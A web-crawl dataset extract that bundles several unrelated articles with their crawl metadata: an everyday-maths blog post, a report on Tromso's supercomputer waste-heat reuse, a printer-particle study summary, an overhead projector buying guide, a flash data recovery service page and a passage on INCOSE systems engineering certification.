So, it is all maths, measurements and calculations. We’re not telling you anything you didn’t learn in school; however, the thought did prompt us to think about maths in general. Maths wasn’t always the most interesting lesson at school for some of us. Plenty of daydreams were enjoyed whilst the teacher scribbled various equations on the board, stating that, ‘One day these will come in handy’. Did we believe that phrase? Most of us never gave it a second thought. However, whether you were a fan at school or not, maths is all around us, in every decision we make, in every action that we do.
When you get up in the morning the first thing you do is look at the time on your phone, see numbers that help you then calculate how long you have to shower, get dressed and swallow some breakfast before you leave the house in time to get to work. It’s not only time we think about but measuring temperature too – we open the curtains to check the weather (sun might equate to a short-sleeved shirt in the office, whereas ice could add another five minutes to your journey) and hopping into a cool shower rather than waiting the extra minute for it to heat up gives you that tiny little lie-in in the morning.
On your journey to work you might be stuck in slow traffic and watch the clock as the minutes tick by whilst you get later and later. You’re also mentally calculating the driving distance to work, navigating spatial decisions between cars and of course, if you’d calculated your journey just a bit differently you might already be sitting at your desk, hands clasped around that perfectly measured and steaming cup of coffee. It’s all down to the numbers with a bit of learned behaviour thrown in the mix.
Fast forward to mid-morning and you’re ticking tasks off of your daily to do list. Prioritising your work is often done so based upon the importance of the task, but mentally it’s a 1, 2, 3 and 4 process to get there. ‘This one will only take me five minutes so I’ll finish that off before I nip to the kitchen to get another glass of water.’ Or ‘well, I’ve got a meeting in an hour so if I really focus between now and then I can get two reports done and dusted if I keep an eye on the time.’ Measuring time is so basic that we don’t even know we’re doing it.
That mid-morning meeting has arrived and no doubt there is at least one mention of an update on performance metrics and you’ll have to show more numbers to identify how things are going in your team.
Lunch has finally arrived and what do you do? Weigh up situations and options based on numbers – a five minute, 1 mile distance walk to the local convenience store might save you counting extra money and give you longer to relax on your break but it will result in a soggy sandwich and stale crisps. On the flip side, approach your sixty minute allotted break a little differently and you might find yourself enjoying a longer distance stroll to a cosy nearby pub, then measuring how many people are there to decide if you can tuck into a tasty pie and chips with your colleagues. Then again, the second option will set you back probably triple what the soggy sandwich costs. Again – it’s all about equations!
Your working day has come to an end so you’re out of the door and racing to your car to try and set off as quickly as possible to beat the traffic. Once you’re home there are more equations at home: measurements and recipes to follow for dinner, trying to squeeze in one more episode of your favourite TV show before bed and, last of all, calculating how much sleep you can get as you reset the alarm on your phone. Then it all starts again the next morning.
How is all of this relevant to what we do here at Gradwell? Without getting more philosophical about what it all means or discussing the mysteries of life, our daily routines consist of a series of equations – that’s the way we live our lives and it’s also the way we do our work. We rely on technology like phones, computers and the internet now but how did all of those things start? It’s simple: numbers, equations and calculations on a piece of paper (or old tablets…nothing like today’s digital notebooks) that grew, changed and evolved over the years to bring us the technological breakthroughs that now enhance our lives.
For more information about how Gradwell can help make your working day a little bit more stress free and efficient using modern technology for connectivity, visit our website at http://www.gradwell.com. | <urn:uuid:58bd5fd3-d298-4521-8c40-51c612ab4318> | CC-MAIN-2017-04 | https://www.gradwell.com/2015/02/12/its-all-about-the-numbers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00047-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956089 | 1,171 | 2.953125 | 3 |
The University of Tromso (UiT) the “Artic University of Norway” is the world’s northernmost university with four campuses spread out across Norway. UiT is already a leader in High Performance Computing (HPC). In 2007 its STALLO cluster became the most powerful cluster in Norway and reached 63rd position in the Top500. In 2014 STALLO 2 is expected to reach 310 Teraflop in peak performance.
UiT’s innovative thinking includes using supercomputing clusters as a heating plant. Specifically, the waste heat from the High Performance Computing facility is the energy source for building and district heating, reducing overall campus energy demand.
“Recently we have moved our attention from counting how many flops we can get out of the supercomputer to how many watts that can be recycled from the same computer” says Svenn Hanssen, Head of Section Research and Educational IT, University of Tromso
UiT believes that hot water cooling is something that gives the Arctic region an advantage and positions the region as a natural place to establish future datacenters. With an average temperature of 4ºC, UiT is an ideal location for re-use of waste heat from data centers. By cutting millions of krones from the power bill, more money can be spent on computing, software and the actual research. Waste heat recovery is also key in UiT’s goal to become the world’s leader in Green HPC.
During the summer of 2014 UiT will complete the build of a new 2MW data center. Its supercomputing cluster is expected to be around 2/3rds cooled by hot water with the longer term goal to make the entire cluster water cooled. The system will use the exit water from cooling the supercomputer as a heat source for the nearby buildings that will expand in the next phase to also provide heat to the hospital next door. The hot water will be used to heat the structures via both wall and ceiling radiators.
UiT began installing Asetek’s RackCDU D2C™ hot water data center liquid cooling in January 2014with the goal of using the supercomputing cluster as a district heat plant. The RackCDU D2C system consists of two key sub systems: D2C™ server coolers that are drop in replacements for the CPU air heat sinks in each server and a RackCDU extension that mounts of the back of each rack. Asetek D2C server coolers bring low-pressure, hot water inside the computing nodes to directly cool high heat flux components such as CPUs, GPUs and memory.
The RackCDU Extension is a 263mm (10.5 inch) cabinet that contains a zero-U rack level Cooling Distribution Unit (hence RackCDU) that exchanges heat between the cooling liquid running through the servers and the liquid in the larger facilities liquid cooling / waste heat recovery loop. Hot cooling liquid moves between RackCDU and server coolers via tubes that attach with dripless quick connectors to the RackCDU and via blind mate connectors to the server coolers. The server cooler, connecting tubes and RackCDU are all delivered pre-filled with coolant. Data center operators never have to deal with server cooling liquid.
RackCDU enables much higher rack densities, reduces the overhead power requirements for data center cooling, lowers acoustic noise and enables the use of waste heat to be recouped for building and district heating.
Hot water cooling is highly effective since the surface temperature of a CPU (case temp) only needs to be maintained between 67°C to 85°C (153°F to 185°F), depending on CPU model. The operating surface temperatures for memory chips, GPUs and co-processors is even higher, in the 90°to 95°C (194°F to 203°F) range. The cooling efficiency of water allows it to maintain the required case temps with a low initial temperature difference between the water and the component being cooled, or a small delta T. This means the water used for cooling the components can be hot. RackCDU D2C is deployable as part of completely new clusters, in server refresh cycles or even as retrofits of existing servers. In particular, there is the ability to implement D2C in many standard air cooled servers offered by OEMs today just as UiT is doing with its HP SL230 servers.
UiT chose to concentrate on D2C cooling of CPUs in the HP SL230 servers used in their HPC cluster. Air-cooled HP SL230’s are a popular choice in the HPC world and RackCDU D2C allows the leveraging these cost-effective nodes to run more efficiently through liquid cooling while enabling high density deployments and substantial power savings.
To make best use of the waste heat a number of factors must be optimized. UiT is manipulating a range of parameters for optimization: flow rates, amount of hot water needed, the temperature of the water, the delta between the supply and return temperature and the size of the supercomputer in terms of possible production of hot water.
Initial testing has shown it is possible to achieve that greater than 70% waste heat recycling with a delta of 25oC between input and exit temperature of the cooling water. The testingto date has been with a rather cold 12oC supply temperature and performance is expected to be even better at higher input temps. Air temperature in the computer room is also a factor. UiT has found that as they increase the room temperature, the water cooled system performance is not affected. Conversely, the air cooled systems start to spend more power for cooling as room temperature rises.
Because it is an HPC computing cluster, a 100% server load is common. The UiT load is typically greater than 80% 24 hours per day/7 days a week, making it ideal for heat capture and reuse.
One of the side effects of moving to hot water cooling and implementing district heating at UiT is the shift in how the supercomputing resource is viewed. No longer is the supercomputer seen as a multi-million dollar yearly expenditure in terms of variable power costs. It is now actually something the whole university expects to be expanded and integrated into the infrastructure to provide heating as well as power cost savings. Indeed, the visibility has built such enthusiasm that there are even artists trying to hook the supercomputer up to new art installations on campus to give different perspectives to the artwork based on the real-time load of the system.
UiT’s leadership in supercomputing is being matched by its mission to become the world’s leader in green High Performance Computing. Not only greening the data center itself but in recouping energy for district heating and having the supercomputing cluster be viewed as a community asset. | <urn:uuid:08d1105c-8c69-4579-9d2a-e992f46f0383> | CC-MAIN-2017-04 | https://www.hpcwire.com/2014/06/23/uit-recycles-supercomputing-power-aseteks-rackcdu/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00349-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93294 | 1,417 | 2.546875 | 3 |
Potentially hazardous particles emitted from common laser printers have been identified by an Australian university and other researchers.
The research, carried out at Queensland University of Technology, studied earlier findings that almost one-third of popular laser printers emitted large numbers of ultrafine particles.
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers.
The tiny particles are potentially dangerous to health because they can penetrate deep into the lungs.
The study found that ultrafine particles were formed from vapours produced when the printed image is fused to the paper.
In the printing process the printer toner is melted, and when it is hot certain compounds evaporate creating vapours. They then nucleate or condense in the air, forming ultrafine particles.
The particles are formed from both the paper and the hot toner. The hotter the printer gets, the greater the chance of the particles forming, the study said.
The study compared a high-emitting printer with a low-emitting printer.
Lower heat emission printers with efficient and regular temperature controls release fewer particles.
Sudden increases in temperature can add to the problem of particles being released, the university found. | <urn:uuid:e055ce47-8726-42d5-bc04-b72a37f353a3> | CC-MAIN-2017-04 | http://www.computerweekly.com/news/2240088370/Researchers-identify-harmful-particles-released-by-printers | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279923.28/warc/CC-MAIN-20170116095119-00167-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.93112 | 249 | 3.578125 | 4 |
there is one place most of us have seen an overhead projector, it's in
a classroom. These machines are valuable tools for teachers around the
world as a simple, cost-effective way to bring images to life for students.
In addition, overhead projectors are a standard tool in business allowing
professionals to create dynamic presentations with ease.
Types: There are two basic types of overhead projectors: transmissive and reflective. Transmissive projectors have the light source (bulb) in the base of the machine. The light is projected up through the glass stage of the projector, through a lens in the projector's head and then onto a projection screen. The light source for reflective projectors is in the head of the projector. The light shines down onto a reflective stage, and then reflects back up through the lens and onto a screen. Both types of projectors have their advantages. Transmissive projectors are usually brighter and the images are typically sharper, but they tend to be larger and heavier. If you want portability and will be only using transparency film, then a reflective projector is a good choice because they tend to be smaller and lighter in weight.
Before purchasing or using an overhead projector, it is a good idea to become familiar with the following components and options.
Lenses: Overhead projector lenses come in three different variations: singlet, doublet and triplet. The image projected will get sharper as your lens quality increases (singlet is the most basic lens; triplet is the most advanced). Not surprisingly, the price of an overhead projector increases with upgrades in lens quality. Also associated with the type of lens is the projector's focal length, which determines how close to or far from the screen the projector will focus.
Brightness: A projector's brightness is measured in lumens. Levels range from 1,700 to 11,000 lumens depending on the model you choose. Generally speaking, the type of image you are going to display (black/white or color), how far you intend to project your image, and the brightness of the room will dictate the desired brightness.
Lamps: Lamps are critical components of all overhead projectors and vary in type, life, wattage and cost. Some projectors offer high/low switches or are built to double the life of the lamp. These projectors can save you money in the future by reducing your lamp replacement costs. A lampchanger which allows the presenter to switch over to another lamp is also a very valuable feature. With a lampchanger, you can be assured that your meeting will continue if you do have a lamp fail.
Options: There are a variety of other options which are tailored to presenters who use LCD panels. These include built-in AC outlets on the projector and a "flip-in" magnifier. Two AC outlets are recommended on the projector: one for your LCD panel and the other for your computer. This makes setting up your equipment much easier. A flip-in magnifier is also a plus because it enlarges the projected image when using an LCD panel.
Stages on an overhead projector are the flat areas upon which transparency film is placed. Stages range from 10 inches to 11 1/4 inches, and it is important to ensure you have a stage that will work well with the size of your transparencies.
Lastly, an area which sometimes gets over looked is the warranty and ease of service for your overhead projector. A longer warranty is obviously the best choice, but also make sure that getting the equipment serviced is easy and convenient. Manufacturers who have servicing locations near you will make sure that you are not without your equipment for a long time.
projectors are versatile, cost-effective presentation tools that are easy
to use and transport. The key to making sure that you purchase the correct
model is to do a quick assessment of your needs and make sure that the
model you're considering fills them.
Copyright © 1998 3M
Please check the latest technology for enhancing and upgrading your network and computer systems:
CD-ROM Towers | CD-Recorders | RAID | Presentation Technology | <urn:uuid:81fa1466-7edc-4c44-9ca4-0a29222f9515> | CC-MAIN-2017-04 | https://kintronics.com/3m/product_guide_overhead.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00377-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940987 | 846 | 3.25 | 3 |
Almost every portable data storage device today relies on NAND flash memory to do its job. You can find NAND chips inside your SSD, your phone, your thumb drive, and your memory cards. You can even find a NAND chip augmenting some of your traditional spinning-platter hard drives. At Gillware Data Recovery, we have NAND flash device recovery experts who can assist you with your flash media-related data recovery needs, regardless of what the device is.
An “exploded view” of a 32-GB Lexar USB drive that was brought to Gillware for flash device recovery
There are quite a few different forms of data storage that don’t involve moving parts. Some of these are volatile, meaning they can only hold data when they’re powered on. Obviously, this is a bad kind of storage to use in your USB thumb drive. A jump drive would be pretty useless if all of the data you put on it vanished as soon as you unplugged it from your computer! Other solid-state storage media is non-volatile, meaning it retains data after power stops flowing through it.
NAND flash memory is a form of non-volatile RAM (random-access memory). Many kinds of RAM, such as the RAM inside a computer, are volatile. But unlike the sticks of RAM you’d find in your computer, flash memory devices hold onto their data after they has been powered off. Over the years, flash memory technology has been refined until NAND flash memory reached a point at which it could compete with traditional spinning platter hard drives as a form of data storage. And it’s been gaining ground with astonishing speed ever since.
What is NAND flash memory?
NAND isn’t actually an acronym for anything, unlike most capitalized words in the computer science world. NAND flash memory gets part of its name from the “negative-AND” logic gate in digital circuitry. The individual cells in a NAND chip function in a way that resembles a NAND gate. While NAND isn’t the only kind of solid-state memory, or even the only kind of flash memory, it can be seen in just about every solid-state data storage device today.
Before flash memory, most forms of non-volatile memory were ROM (read-only memory). There were some forms of non-volatile RAM before flash memory was invented. But they were for the most part very impractical to use. “Flash” memory (so named because erasing the data from the chips reminded the creator’s colleague of a camera flash) was developed in the 1980s as an offshoot of EEPROM (electrically erasable programmable read-only memory).
EEPROM is a form of ROM. ROM is meant to be programmed once, then never altered again. EEPROM, however, could be completely erased using an electrical current, and then re-programmed. Flash memory, unlike EEPROM, could be programmed and erased on a block level. Individual blocks in a flash memory device could be programmed, erased, and re-programmed until the cells in the device wore out. Since portions of the flash memory chip could be programmed and reprogrammed, leaving the rest of the device alone, flash memory behaved more similarly to RAM than ROM.
How NAND Flash Works
You can think of a single NAND flash memory chip as equivalent to the spinning platters inside a hard drive. Platters are covered with a thin ferromagnetic coating and divided up into tiny magnetically-charged regions. The charge of these regions denotes whether each is a “0” or a “1”. In computer science, this is the smallest possible unit of data, the bit (short for “binary digit”). A NAND chip, on the other hand, is built out of cells. Each cell is a floating-gate transistor capable of storing a charge. Traditionally, each cell could only store a single bit, but multi-level cells can store more than one bit of data. These cells are strung out into long columns and packed together in rows.
EEPROM, flash memory’s progenitor, could be programmed, completely erased, and then re-programmed again. Every program-erase cycle caused some degradation to the actual cells in the EEPROM chip. Likewise, NAND cells have a limited amount of program-erase cycles before they stop working. For modern solid-state devices, each cell should be able to withstand hundreds of thousands of program-erase cycles before failing. In modern SSDs, when this threshold is reached, the drive becomes read-only, as it can no longer be programmed or erased.
How Can I Lose Data from a Flash Memory Device?
The solid-state drive from an OCZ Trion 100 SSD flash device recovery case
Flash memory devices are more resilient than hard drives. A hard drive that falls a few feet onto a hardwood floor can be in critical condition; a flash drive that falls from the same height might be a little scuffed. Flash devices have become the portable storage medium of choice for precisely this reason. Your flash drive, SD card, and smartphone are constantly being jostled around and battered—while in use, no less. A traditional hard drive simply can’t take that kind of punishment, at least not for long.
But sometimes things just get taken too far. People get careless, mistakes get made. Flash drives or SD cards go through the wash. Your smartphone slips out of your pocket while you’re biking and hits the concrete, or gets way too close to a body of water for comfort. A power surge or faulty machinery can short out your thumb drive or solid state drive. And that’s just what can happen physically to your device. You can accidentally delete your files or reformat your partition. You can eject the device too early and corrupt your files or damage the boot sector. The cells in your device’s NAND chip can just go bad (usually at the worst possible time).
The technology behind flash memory is radically different from the technology that makes your hard drive work. But after you’ve gone above the bit level and into the realm of filesystems, things start to look about the same. Recovering data after accidentally reformatting or deleting files from a USB drive or SSD is usually somewhat hardware-agnostic. A solid state drive formatted for Windows has a partition table, superblock, and master file table just like a hard drive does, even though the underlying hardware is radically different.
Flash device recovery gets really tricky if there is something wrong with the flash device’s physical components or firmware. Flash devices have firmware just as hard drives do, although theirs works much differently. Firmware is the device’s “operating system” that acts as a mediator between the user and the storage medium. The firmware for USB drives and SD cards is simple. But SSD firmware is very complex. Solid state drives aren’t just faster than other storage media because they have NAND chips. Those chips are organized and used in a way that optimizes and speeds up their performance. There’s a lot of complex firmware regulating an SSD’s lightning-fast, Barry Allen-esque speed.
Many models of solid-state drives today are automatically encrypted on the hardware level. The encryption key is stored in the drive’s controller chip. If the controller cannot be resuscitated or the encryption key has been otherwise lost, recovering data from the SSD’s NAND chips is extremely difficult at best, and impossible without assistance from the original manufacturers. Gillware is at the forefront of researching data recovery methods from SSDs and working directly with SSD manufacturers to improve our abilities to recover from these SSDs.
NAND Chip Removal and Recovery
A flash memory storage device with two NAND chips that had to be removed for flash device recovery purposes
When a flash device has died, often the only way to access the data on it is to remove its NAND chip. Unlike a hard drive’s platters, NAND chips can be read outside of the device they belong to. All you need is a tool to desolder the chip from the board and a chip reader. But there’s a catch.
The data stored in your typical NAND chip is a jumbled mix of user data and system data. The controller chip takes the data coming to and from the NAND chip and makes sense of it. Without it, everything you read from your flash drive would be incomprehensible to you. And that’s what you get when you look at the raw data from your flash device’s NAND chip. At Gillware, we have skilled computer scientists who can reverse-engineer the controller’s job using custom emulation software. Our scientists can make sense of all that information and reassemble it into its proper form.
Monolithic Flash Device File Recovery
Sometimes, though, the NAND chip isn’t easy to get at. Some kinds of USB drives, SD cards, and microSD cards are built as “monolithic flash devices”. While many flash memory devices keep their components relatively out in the open once you get past the case, monoliths hold their cards close to their chests. The NAND chip, controller chip, and the actual interface that connects your device to other devices is soldered into a single seemingly-impenetrable package. Our flash device data recovery engineers know how to access the NAND chips of even these monolithic flash devices. A hidden ball grid array offers a backdoor into these chips, but only for those who are as clever and resourceful as our flash device data recovery experts.
Why Choose Gillware for My Flash Device Recovery Needs?
Flash media comes in all shapes and sizes. Our experts can perform NAND flash device recovery procedures regardless of the form factor.
If you need data recovered from a USB flash drive, SD or microSD memory card, smartphone, tablet, or solid state drive, our technicians here at Gillware are your best bet. Our flash device recovery experts have experience with thousands of flash devices. Gillware works hard to stay on top of all of the latest advancements in flash memory and solid-state technology.
We offer our flash device recovery services free of any upfront charges. There are no evaluation fees for flash device data recovery, regardless of the device. For clients in the continental United States, we cover the cost inbound shipping as well. Talk to one of our flash device recovery client advisers today to get a free estimate and prepaid UPS shipping label.
At Gillware, no matter what work goes into your case, we only charge you for our services if we meet your recovery goals at an acceptable price to you. If we finish our free evaluation and present you with a price quote that is too high, you are free to back out without having to pay us a dime. We don’t charge you anything until we’ve finished our flash device recovery work—and only if we’re successful at recovering your critical data.
Ready to Have Gillware Assist You with Your Flash Device Recovery Needs?
Best-in-class engineering and software development staff
Gillware employs a full time staff of electrical engineers, mechanical engineers, computer scientists and software developers to handle the most complex data recovery situations and data solutions
Strategic partnerships with leading technology companies
Gillware is proud to be a recommended provider for Dell, Western Digital and other major hardware and software vendors. These partnerships allow us to gain unique insight into recovering from these devices.
RAID Array / NAS / SAN data recovery
Using advanced engineering techniques, we can recover data from large capacity, enterprise grade storage devices such as RAID arrays, network attached storage (NAS) devices and storage area network (SAN) devices.
Virtual machine data recovery
Thanks to special engineering and programming efforts, Gillware is able to recover data from virtualized environments with a high degree of success.
SOC 2 Type II audited
Gillware has been security audited to ensure data safety, meaning all our facilities, networks, policies and practices have been independently reviewed and determined as completely secure.
Facility and staff
Gillware’s facilities meet the SOC 2 Type II audit requirements for security to prevent entry by unauthorized personnel. All staff are pre-screened, background checked and fully instructed in the security protocol of the company.
We are a GSA contract holder.
We meet the criteria to be approved for use by government agencies
GSA Contract No.: GS-35F-0547W
Our entire data recovery process can be handled to meet HIPAA requirements for encryption, transfer and protection of e-PHI.
No obligation, no up-front fees, free inbound shipping and no-cost evaluations.
Gillware’s data recovery process is 100% financially risk free. We only charge if the data you want is successfully recovered.
Our pricing is 40-50% less than our competition.
By using cutting edge engineering techniques, we are able to control costs and keep data recovery prices low.
Instant online estimates.
By providing us with some basic information about your case, we can give you an idea of how much it will cost before you proceed with the recovery.
We only charge for successful data recovery efforts.
We work with you to define clear data recovery goals for our technicians, and only charge you upon successfully meeting these goals and recovering the data that is most important to you.
Gillware is trusted, reviewed and certified
Gillware has the seal of approval from a number of different independent review organizations, including SOC 2 Type II audit status, so our customers can be sure they’re getting the best data recovery service possible.
Gillware is a proud member of IDEMA and the Apple Consultants Network. | <urn:uuid:5b6a77f6-1378-4b1d-968e-eb7eefa5a1a1> | CC-MAIN-2017-04 | https://www.gillware.com/flash-device-recovery-services/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00285-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.929255 | 2,887 | 2.59375 | 3 |
Using mouse and touch inputs
You can restrict the simulator to accept only mouse inputs, only touch inputs, or both. In the controller, click Utilities and choose the type of input you would like from the drop-down menu.
Mouse Mode: Use both left and right clicks to represent default mouse clicks.
Touch Mode: Use left-clicks as single-touch events, and initiate multi-touch playback. Use right-clicks to specify touch points for multi-touch simulation.
Mixed Mode: Use left-clicks to represent default clicks and to initiate multi-touch playback. Use right-clicks to specify touch points for multi-touch simulation.
Using Touch Area inputs
The Touch Area is available to simulate devices that feature touch input other than a conventional touch screen. In the controller, click Touch Area.
The Touch Area supports two types of touch input: swipes and single taps.
- To perform a swipe, click and drag your mouse in the Touch Area.
- To perform a single tap, click your mouse button in the Touch Area. | <urn:uuid:39a64b27-70b4-49ac-83ec-768857a1b287> | CC-MAIN-2017-04 | http://developer.blackberry.com/devzone/develop/simulator/use_mouse_touch_inputs.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00193-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.803476 | 220 | 2.578125 | 3 |
You probably have started hearing the term UEFI a lot more lately along with all of the Windows 10 news, but what exactly is UEFI and why do you need it? UEFI stands for Unified Extensible Firmware Interface and is the next generation interface between the operating system and platform firmware. It replaces the antiquated legacy Basic Input/Output System, aka BIOS, that has been around for years. The UEFI standard was created by the UEFI consortium which consists of over 140 technology companies. UEFI was developed to allow support for new technologies during the booting process before the operating system loads. It is based on the EFI 1.10 specification that was originally published by Intel®.
BIOS has significant limitations as it relates to modern hardware. It is limited to only 16-bit processor mode and 1 MB of addressable memory. UEFI on the other hand supports either 32-bit or 64-bit processor mode and can access all of the system’s memory. BIOS uses a Master Boot Record (MBR) for the disk partitioning scheme, whereas UEFI uses a newer partitioning scheme called GUID Partition Table (GPT) which overcomes certain limitation of MBR. UEFI is able to support disk sizes greater than 2 TB, with a maximum disk and partition size of 8 Zebibytes (Zib).
BIOS disk partitioning1:
UEFI disk partitioning2:
However, converting an operating system’s drive partition from MBR to GPT is a destructive process, in which the new partitioning scheme needs to be formatted and the operating system needs to be completely reinstalled. Without the right process and tools, this can be an expensive manual effort.
There are also several security benefits to running UEFI over BIOS on Windows 10 systems. Secure Boot3: protects the pre-boot process against root kits/boot kits and requires no additional configuration (other than switching it on once the system is running UEFI). Once enabled, only signed boot loaders will be able to run. Other advantages of UEFI that your end users will appreciate is faster startup times, faster shutdown times, faster sleep times and faster resuming times compared to BIOS based systems.
Lastly, some other key Windows 10 security features that require UEFI are: Credential Guard, Device Guard, Early Launch Anti-malware driver and Measured Boot. With the amount of attacks and data breaches happening today’s age, now is the time to get as secure as possible and take advantage (or at least put your environment in a position to take advantage) of all the security features that Windows 10 offers. Start today by migrating to Windows 10 and switching to UEFI as part of the process and leave BIOS where it belongs – in the past. | <urn:uuid:5b453e3b-c848-4fbe-9f3f-0a2192603fb3> | CC-MAIN-2017-04 | https://www.1e.com/blogs/2016/02/16/what-is-uefi-and-why-do-i-need-it/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00250-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.938254 | 570 | 3.09375 | 3 |
Our recent paper, The State of International Co-operation on Cybercrime, explored what the international community has done, or tried to do, to tackle the cybercrime issue.
It’s quite rare to have the opportunity to highlight a great example of international co-operation, but according to V3.co.uk, a hacker responsible for one of the largest botnets ever created has been arrested thanks to an international effort.
The arrest comes months after Spanish police arrested three people, alleged to be the ringleaders of the operation.
The Mariposa botnet, which infected some 12 million computers and some HTC mobile devices, also impacted major banks and US Fortune 500 companies.
The virus allowed hackers to steal online banking and credit card details, as well as giving them access to other sensitive data.
This further arrest is a good example of what can be done when nations co-ordinate their fight against cybercrime, and it does serve as a warning to other hackers that their business is more risky than they may imagine.
However, at the moment the major ‘wins’ in the fight against cybercrime – at an international level – seem to be high profile attacks that target major corporations and financial institutions.
Which is somewhat inevitable given the work required to co-ordinate efforts across borders.
Somehow, this co-operation has to be encouraged and eased so that the vast number of smaller attacks which are businesses and home users can be dealt with.
Cross-posted from Network Box | <urn:uuid:6ff4e1f7-286a-4ad4-a03a-233c2117e0b0> | CC-MAIN-2017-04 | http://www.infosecisland.com/blogview/6204-Mariposa-Botnet-Arrest-via-International-Co-operation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00094-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960191 | 307 | 2.515625 | 3 |
Head of the Class—Listening and Note-Taking
A big part of being a great learner is being a great listener. Of course, listening means much more than just hearing, which requires little to no effort at all. To hear something is to merely know that your ears are working properly. Listening refers to actively taking in a combination of auditory and visual information on a given topic and interpreting that data against what you already know about it. If you’re a good listener, there is literally no limit to what you can learn.
In interpersonal training environments such as classrooms and coaching, listening is usually complemented by note-taking. The vast amount of information transfer over an extended period of time necessitates recording the data in writing for reference later on. The notes reinforce learning by allowing them to “re-listen” to a course in their minds long after it has taken place.
Needless to say, there’s a lot more to being a good listener and note-taker than simply knowing they’re important. Here are some steps you can take to improve your proficiency in these learning practices:
- Don’t Worry (Too Much) About Appearances: Obviously, you want to write legibly, but you shouldn’t be too concerned about the occasional misspelling or the aesthetic qualities of handwriting. This is an especially important point for older learners, who were taught at a very young age that their writing should be painstakingly neat. Just get the information down on the page during class. If it makes you feel better, recopy the notes afterwards when you have some time. In fact, this actually can help you retain the facts and concepts better.
- Mind the Gap: Luckily for learners, their brains move faster than their instructor’s mouth can—about four times as fast, actually. They should exploit this gap by thinking (however briefly) about what’s been said prior to actually taking notes on it. This brings us to the next point…
- Capture the Big Ideas: Although the brain might move faster than the mouth, the hand does not. You’re not going to be able to write down everything that the lecturer says, so don’t even attempt it. Instead, try to record the most salient points. You can usually figure out what the most important information is by observing cues in the instructor’s speech and body language. Some teachers will be very explicit about what the key ideas are. Back in college, I had a couple of professors who would actually say in their lectures, “Be sure to write this down.” Some found this approach grating, but hey, it meant less effort for me!
- Write in Shorthand: Here’s an old trick that we journalists use. We’ve got to be able to write things down really quick, so we use shorthand whenever possible. Under this system, “level” becomes “lvl” and “association” becomes “ass.” (Please feel free to “crack” a booty joke here.) Fortunately, many younger learners who are serious instant- and text-messenger users are way ahead of the curve on this one. You don’t have to adopt the shorthand systems of grizzled old reporters or bratty, catty teenagers, though. Just use whatever works for you.
- Ask Questions: I’ll make this point by way of an anecdote. Back in the late 1940s, a couple of years after the successful use of A-bombs against Japan, a U.S. Navy admiral was assigned to the U.S. government’s atomic energy facility in Oak Ridge, Tenn. Scientists at this compound began to get irritated by the fact that he would ask the most elementary questions about nuclear power, and would make these inquiries over and over again. The people who had to explain these points repeatedly to him probably thought he was a little slow, but Hyman Rickover would later go on to become the father of the nuclear-powered navy, and owed much of his success to the fact that he wasn’t afraid to ask questions. You might not need to go as far as Rickover did in your quest for knowledge, but you should be sure to question something perplexing or unclear in order to understand it better. After all, asking questions enables you to frame your interlocutor’s explanation of something in your terms, and that makes listening that much easier. | <urn:uuid:a7c2e5c9-e7c4-4b20-98d0-e6c34eee0a3a> | CC-MAIN-2017-04 | http://certmag.com/head-of-the-class-listening-and-note-taking/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281162.88/warc/CC-MAIN-20170116095121-00002-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.967347 | 936 | 3.796875 | 4 |
INCOSE Systems Engineer Certs Offer Broad-Based Skills Validation
The job title of “systems engineer” might not sound all that glamorous at first, but once you consider that these IT pros work on complex systems that can include military aircraft and tanks, the job description suddenly becomes a lot more exciting.
As David Walden, Certified Systems Engineering Professional (CSEP) and INCOSE certification program manager, explained it, a systems engineer is an IT professional who heads up a development project on an intricate, software-intensive system. The system engineer has a broad role, looking at the entire system from conception to final disposal.
Take, for example, a nuclear reactor. Walden said the systems engineer would need to consider: “How do you dispose of that system safely, in a way that is both economical and good for the environment? How do you design the system so that it can be easily disassembled or reused or recycled?
“[Ultimately], a systems engineer looks at the whole problem and interfaces with the customer to determine what the real need is, envision what that system will be and then make sure it’s delivered and meets and exceeds [the] customer’s expectations,” Walden said.
“They translate all of those vague and soft-and-fuzzy stakeholder [requirements] — ‘I want a car that goes fast,’ ‘I want a rocket ship that can be launched 42 times’ — and then they work with the design engineers to make that a technical reality.”
Like many roles in the IT industry, there are organizations dedicated to training and certifying systems engineers. One such organization is the International Council on Systems Engineering (INCOSE). The professional society — created in 1990 — serves more than 6,000 professionals worldwide through its efforts to provide education and development opportunities to the global systems engineering community. INCOSE also establishes professional standards for the field.
Earlier this year, INCOSE upgraded its certification program to a three-tiered model. CSEP is the core certification for the program and validates a foundational level of systems engineering knowledge. This exam — created in 2004 — was upgraded in July in conjunction with the release of a new version of INCOSE’s Systems Engineering Handbook: Version 3.1. This upgrade gives the exam an international perspective, using international standard ISO/IEC 15288.
The CSEP is for professionals with a minimum bachelor’s degree in science or a technical subject, along with five years of experience in systems engineering. The degree also can be replaced by additional years of experience.
